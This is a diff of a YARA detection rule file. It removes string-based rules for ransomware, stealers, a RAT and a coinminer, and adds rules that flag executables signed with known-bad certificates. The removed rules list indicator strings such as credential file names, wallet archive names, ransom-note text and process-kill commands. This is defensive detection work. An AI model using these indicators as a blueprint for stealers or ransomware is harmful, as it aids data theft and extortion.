+		logic_hash = "ee965ee8b6ebbb6171e3b10a7887acf35c9ed7fcbe49b7f403190c7fb046ec63"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Startdelay for %d ms to avoid some dynamic AV detects!" ascii
-		$s2 = "Use Debug for moving faster!" ascii
-		$s3 = "Logging Mutex %s to %s" ascii
-		$s4 = "FIRST AND ONLY COPY RUNNING! Mutex %s" ascii
-		$s5 = "the most secret 3d GetWinApiPointers line in the world!" ascii
-		$s6 = "[+] makeMD5hash. " ascii
+		thumbprint = "a1561cacd844fcb62e9e0a8ee93620b3b7d4c3f4bd6f3d6168129136471a7fdb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures [ i ] . serial == "41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" )
 }
-rule DITEKSHEN_MALWARE_Win_Coinminer01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_41D05676E0D31908Be4Dead3486Aeae3 : FILE
 {
 	meta:
-		description = "Detects coinmining malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "739e7cea-c6b6-5add-86d4-382b00e2b645"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d668f53b-3d1c-5fcb-9f9c-2923e63f93a9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5778-L5790"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1806-L1817"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "31a7531ecc7b8a35ba882c17d15bd3581e65b4b99dd3a7cb8bca8f6edf204114"
+		logic_hash = "e4eb406e433b38ac127ba22040c48b510636eb55e2b524b02386710709d343b6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "-o pool." ascii wide
-		$s2 = "--cpu-max-threads-hint" ascii wide
-		$s3 = "-P stratum" ascii wide
-		$s4 = "--farm-retries" ascii wide
-		$dl = "github.com/ethereum-mining/ethminer/releases/download" ascii wide
+		thumbprint = "e6e597527853ee64b45d48897e3ca4331f6cc08a88cc57ff2045923e65461598"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( $dl ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rov SP Z O O" and pe.signatures [ i ] . serial == "41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" )
 }
-rule DITEKSHEN_PUA_Win_Ultrasurf : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_13C7B92282Aae782Bfb00Baf879935F4 : FILE
 {
 	meta:
-		description = "Detects UltraSurf / Ultrareach PUA"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ba0f6867-bddc-5e72-978c-8e29b1b6b709"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "244ff442-0bce-5f9f-85ea-33fafe9a2e7b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5792-L5807"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1819-L1830"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d8d17b1bf20c12f864697d3dd66f345a8b93e2a75f0489b58b23b7f5264b6be3"
+		logic_hash = "2742fd71eb8219db7785ad46be18a906fdab0914f632dfbf531238fd551a5b65"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Ultrareach Internet Corp." ascii
-		$s2 = "UltrasurfUnionRectUrlFixupWUse Proxy" ascii
-		$s3 = "Ultrasurf UnlockFileUrlEscapeWUser-Agent" ascii wide
-		$s4 = "Ultrasurf0#" ascii
-		$m1 = "main.bindata_read" fullword ascii
-		$m2 = "main.icon64_png" fullword ascii
-		$m3 = "main.setProxy" fullword ascii
-		$m4 = "main.openbrowser" fullword ascii
+		thumbprint = "c253cce2094c0a4ec403518d4fbf18c650e5434759bc690758cb3658b75c8baa"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or ( all of ( $m* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" )
 }
-rule DITEKSHEN_MALWARE_Win_Hello : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D627F1000D12485995514Bfbdefc55D9 : FILE
 {
 	meta:
-		description = "Hunt for Hello / WickrMe ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "99c11aab-8a3a-5e10-9af0-542e55129d51"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "dd18086c-063b-542e-915b-5bd452ee452e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5809-L5820"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1832-L1843"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f52f12eb38613f5afd5258b5263c6e6e2d9db6c9659a769f896a2bb66564fa69"
+		logic_hash = "9ff60a73b889c8f1df127ead90a93fbf92131cfb475d58eea1ba1569f3e99e00"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DeleteBackupFiles" ascii wide
-		$s2 = "GetEncryptFiles" ascii wide
-		$s3 = "DeleteVirtualDisks" ascii wide
-		$s4 = "DismountVirtualDisks" ascii wide
+		thumbprint = "5fac3a6484e93f62686e12de3611f7a5251009d541f65e8fe17decc780148052"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THREE D CORPORATION PTY LTD" and pe.signatures [ i ] . serial == "00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" )
 }
-rule DITEKSHEN_MALWARE_Win_Buterat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_62205361A758B00572D417Cba014F007 : FILE
 {
 	meta:
-		description = "Detects ButeRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "74f63d61-6589-5fb1-864a-3a02ddd57ebc"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7838c733-7212-5e86-bb3c-5dfefb727a4b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5822-L5839"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1845-L1856"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3d93e8dc1bde8e77c11586c8d8b67d137ef2c4791e12269f1af310fbe14832b"
+		logic_hash = "52d67bc94e82bb9a36e969d393c395465c84ff76f89c5f8407c20e2c761000e3"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "TVqQAAMAA" ascii
-		$s1 = "ipinfo.io/geo" wide
-		$s2 = "/index.php" wide
-		$s3 = "Copy-Item -Path" wide
-		$s4 = ";Start-Process" wide
-		$s5 = "Microsoft\\Windows\\Start Menu\\Programs\\Startup" wide
-		$s6 = "LOCALAPPDATA" fullword wide
-		$s7 = "passwords.json" wide
-		$s8 = "Scripting.FileSystemObject" fullword wide
-		$z1 = /(edge|chrome|opera|exodus|jaxx|atomic|coinomi)\.zip/ ascii wide nocase
+		thumbprint = "83e851e8c50f9d7299363181f2275edc194037be8cb6710762d2099e0b3f31c6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) or 1 of ( $z* ) ) and ( 4 of ( $s* ) ) or ( 6 of ( $s* ) ) or ( #z1 > 4 and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNITEKH-S, OOO" and pe.signatures [ i ] . serial == "62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" )
 }
-rule DITEKSHEN_MALWARE_Win_Cookiestealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_566Ac16A57B132D3F64Dced14De790Ee : FILE
 {
 	meta:
-		description = "Detects generic cookie stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "64c6c59d-4046-5949-bf71-22a5f6bfa209"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "05f49d36-7bf1-5bbc-b728-e1616366c15e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5841-L5857"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1858-L1869"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9cc406ae078e37430b3cf10954c02014b9760bc887344842e724df735d1d9808"
+		logic_hash = "0618ce3ce0c5f8923c12a99586bbec8ec86229c7e08af75f5b0756f348d53bd5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "([\\S]+?)=([^;|^\\r|^\\n]+)" fullword ascii
-		$s2 = "(.+?): ([^;|^\\r|^\\n]+)" fullword ascii
-		$s3 = "Set-Cookie: ([^\\r|^\\n]+)" fullword ascii
-		$s4 = "cmd.exe /c taskkill /f /im chrome.exe" fullword ascii
-		$s5 = "FIREFOX.EXE|Google Chrome|IEXPLORE.EXE" ascii
-		$pdb1 = "F:\\facebook_svn\\trunk\\database\\Release\\DiskScan.pdb" fullword ascii
-		$pdb2 = "D:\\Projects\\crxinstall\\trunk\\Release\\spoofpref.pdb" fullword ascii
-		$ua1 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" fullword ascii
-		$ua2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" fullword ascii
+		thumbprint = "2e44464a5907ac46981bebd8eed86d8deec9a4cfafdf1652c8ba68551d4443ff"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $pdb* ) and 1 of ( $ua* ) ) or ( all of ( $ua* ) and 1 of ( $pdb* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unirad LLC" and pe.signatures [ i ] . serial == "56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" )
 }
-rule DITEKSHEN_MALWARE_Win_Bitcoingrabber : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_661Ba8F3C9D1B348413484E9A49502F7 : FILE
 {
 	meta:
-		description = "Detects generic bitcoin stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f73b58da-1db5-5767-ae0a-074648e30966"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "75fb83a1-c493-510a-8c01-4cc699d71465"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5859-L5875"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1871-L1882"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2dc762525c1fbf25517df52f0561d96d7469bf1367eada31c236fc313001c6cb"
+		logic_hash = "661af02d7a206f50e996caf690ded541acab8c8268df9e86744d36f7322efe5c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s2 = "Bitcoin-Grabber" ascii
-		$s3 = "Bitcoin_Grabber" ascii
-		$s4 = "encrypt resources [compress]T" fullword ascii
-		$s5 = "code control flow obfuscationT" fullword ascii
-		$s6 = "\\Users\\lakol\\Desktop\\a\\Crypto Currency Wallet Changer\\" ascii
-		$pat1 = "\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}\\b" fullword wide
-		$pat2 = "\\b0x[a-fA-F0-9]{40}\\b" fullword wide
-		$pat3 = "\\b4([0-9]|[A-B])(.){93}\\b" fullword wide
+		thumbprint = "4ca944c9b69f72be3e95f385bdbc70fc7cff4c3ebb76a365bf0ab0126b277b2d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $pat* ) and 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unique Digital Services Ltd." and pe.signatures [ i ] . serial == "66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" )
 }
-rule DITEKSHEN_MALWARE_Win_FOXGRABBER : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0092D9B92F8Cf7A1Ba8B2C025Be730C300 : FILE
 {
 	meta:
-		description = "Detects FOXGRABBER utility"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b98e501c-e9c6-5fcc-bfa0-9475ce32864c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "856b4522-f314-5cbb-872e-08b21107881b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5877-L5890"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1884-L1895"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5ecba516f1155bdcccf83b0a034b11d8eac8619d4c3326fdbc76082fbe4daf02"
+		logic_hash = "207fcc48053afb6a435c40fd8e25a88753139c35f4882a1975fdb8c55dc8ea89"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "start grabbing" wide
-		$s2 = "end grabbing in" wide
-		$s3 = "error of copying files from comp:" wide
-		$s4 = "\\Firefox\\" wide nocase
-		$pdb1 = "\\obj\\Debug\\grabff.pdb" ascii
-		$pdb2 = "\\obj\\Release\\grabff.pdb" ascii
+		thumbprint = "b891c96bd8548c60fa86b753f0c4a4ccc7ab51256b4ee984b5187c62470f9396"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UPLagga Systems s.r.o." and pe.signatures [ i ] . serial == "00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Browsergrabber : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E5Ad42C509A7C24605530D35832C091E : FILE
 {
 	meta:
-		description = "Hunt for FOXGRABBER-like samples but for various browsers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a50a60cf-5ab8-5e4e-be00-aa0306f4d84f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "44615e9d-6677-5642-b56d-82c0577f758c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5892-L5906"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1897-L1908"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c96a63566280758d8c32542bfab3c6faa7d21329430345f51ea4c2f0a6809dc2"
+		logic_hash = "8d76474257ee9a24d4785ddd119e586712a157ff7b420a7db2b8efe06c43f76c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "start grabbing" wide
-		$s2 = "end grabbing in" wide
-		$s3 = "error of copying files from comp:" wide
-		$s4 = /(Chrome|Edge)/ wide
-		$ff = "\\Firefox\\" wide nocase
-		$pdb1 = "\\obj\\Debug\\grab" ascii
-		$pdb2 = "\\obj\\Release\\grab" ascii
+		thumbprint = "17b1f6ffc569acd2cf803c4ac24a7f9828d8d14f6b057e65efdb5c93cc729351"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and not ( $ff ) and ( all of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VESNA, OOO" and pe.signatures [ i ] . serial == "00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" )
 }
-rule DITEKSHEN_MALWARE_Win_Deathransom : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3E57584Db26A2C2Ebc24Ae3E1954Fff6 : FILE
 {
 	meta:
-		description = "Detects known DeathRansom ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a6eeb607-8b5c-5982-8b5a-aa2b3c6a65e6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9073846e-97c7-5b2e-a81f-3bbd06699842"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5908-L5925"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1910-L1921"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3c87364a7ecc403262056eeccaa16bf230fbbe684e21d35099d0d572abba9eda"
+		logic_hash = "cfc68c32ceba351610651d34fb420c64bab9a3b1564d9b6392f0ee8cdcdac7de"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%s %f %c" fullword ascii
-		$pdb1 = ":\\wud.pdb" ascii
-		$spdb2 = "\\crypt_server\\runtime\\crypt" ascii
-		$spdb3 = "\\bin\\nuvin.pdb" ascii
-		$h1 = "#Dunubeyokunov" wide
-		$h2 = "^Neyot dehipijakeyelih" wide
-		$h3 = "talin%Sanovurenofibiw" wide
-		$h4 = "WriteFile" fullword ascii
-		$h5 = "ClearEventLogA" fullword ascii
-		$h6 = "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" ascii wide
+		thumbprint = "4ecbada12a11a5ad5fe6a72a8baaf9d67dc07556a42f6e9a9b6765e334099f4e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $pdb* ) or ( all of ( $s* ) and 1 of ( $pdb* ) ) or 5 of ( $h* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zaryad LLC" and pe.signatures [ i ] . serial == "3e:57:58:4d:b2:6a:2c:2e:bc:24:ae:3e:19:54:ff:f6" )
 }
-rule DITEKSHEN_MALWARE_Win_Unlockyourfiles : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_13794371C052Ec0559E9B492Abb25C26 : FILE
 {
 	meta:
-		description = "Detects UnlockYourFiles ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "265f2a48-143a-56c9-9cd4-b5137799a9e8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e2a4fdb2-fa04-5662-bb84-5c0c4892e3af"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5927-L5946"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1923-L1934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "05f549467fac03d4aa2248a9c6c87e4c4273ed6ad727ebb77a4dd115032e454b"
+		logic_hash = "af80177181efd92b4e1a4a5c665df01add069dc3b47074bcbdd503516cf5a844"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "filesx0" wide
-		$s2 = "_auto_file" wide
-		$s3 = "<EncyptedKey>" fullword wide
-		$s4 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\" wide
-		$s5 = "DecryptAllFile" fullword ascii
-		$s6 = "AES_Only_Decrypt_File" fullword ascii
-		$m1 = "Free files decrypted" wide
-		$m2 = "Restore my files" wide
-		$m3 = "Type tour password..." wide
-		$m4 = "files encrypted by strong password" ascii
-		$m5 = "buy bitcoin" ascii
-		$m6 = "Unlock File" fullword wide
+		thumbprint = "dd3ab539932e81db45cf262d44868e1f0f88a7b0baf682fb89d1a3fcfba3980b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 5 of ( $m* ) or ( 2 of ( $s* ) and 2 of ( $m* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Carmel group LLC" and pe.signatures [ i ] . serial == "13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" )
 }
-rule DITEKSHEN_MALWARE_Win_Decryptmyfiles : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_51Aead5A9Ab2D841B449Fa82De3A8A00 : FILE
 {
 	meta:
-		description = "Detects DecryptMyFiles ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dab518f2-3fac-5492-88fb-35cd0000ec47"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d64ff10d-e4dd-5d89-a600-d136571be940"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5948-L5964"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1936-L1947"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5b7f74569700e2ad3f31388571dad5ffda45f5ab3dd36806f7514aff0367d5ba"
+		logic_hash = "1658a12bb040b5b16c61469fe52abbaaecf5bd66bf5e45a2c2da9f80fa0c66f5"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "FILES ENCRYPTED" wide
-		$s2 = "pexplorer.exe" fullword wide
-		$s3 = "uniquesession" fullword ascii
-		$s4 = ".[decryptmyfiles.top]." fullword ascii
-		$s5 = "decrypt 1 file" ascii
-		$s6 = "(databases,backups, large excel" ascii
-		$c1 = "api/connect.php" ascii
-		$c2 = "decryptmyfiles.top" ascii
-		$c3 = "/contact/" ascii
+		thumbprint = "155edd03d034d6958af61bc6a7181ef8f840feae68a236be3ff73ce7553651b0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or all of ( $c* ) or ( 2 of ( $c* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Corsair Software Solution Inc." and pe.signatures [ i ] . serial == "51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Motocos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Bce1D49Ff444D032Ba3Dda6394A311E9 : FILE
 {
 	meta:
-		description = "Detects Motocos ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "be7284be-b57d-5a2c-9a84-37d76445cd0d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ee980353-b7c3-5738-84ae-e51c021e6597"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5966-L5981"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1949-L1960"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "99ac365c277058503874313e3a74ab016d6d279b47c754c3df950e3ce60e29f1"
+		logic_hash = "eeb1556808e790eea964658a8499ec2d9cc5638bf696fbbade2bc08a29fb3e65"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Block Investigation Tools" wide
-		$s2 = "powershell.exe,taskmgr.exe,procexp.exe,procmon.exe" wide
-		$s3 = "google.com,youtube.com,baidu.com,facebook.com,amazon.com,360.cn,yahoo.com,wikipedia.org,zoom.us,live.com,reddit.com,netflix.com,microsoft.com,instagram.com,vk.com," wide
-		$s4 = "START ----" wide
-		$s5 = "TEngine.Clear_EventLog_Result" wide
-		$s6 = "TEngine.EncryptLockFiles" wide
-		$s7 = "TEngine.CleanShadowFiles" wide
-		$s8 = "TDNSUtils.SendCommand" wide
+		thumbprint = "e9a9ef5dfca4d2e720e86443c6d491175f0e329ab109141e6e2ee4f0e33f2e38"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DECIPHER MEDIA LLC" and pe.signatures [ i ] . serial == "bc:e1:d4:9f:f4:44:d0:32:ba:3d:da:63:94:a3:11:e9" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent12 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Dadf44E4046372313Ee97B8E394C4079 : FILE
 {
 	meta:
-		description = "Detects downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "841b998b-99d1-50d8-bc7b-75b2a8e690bf"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "bb7178f4-079f-5f7e-9761-3f73203603c7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5983-L5993"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1962-L1973"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9845414f4ce4cc25b75a8de7569c4135bbb7ba9098fd4c50d7ac80302e99b8f"
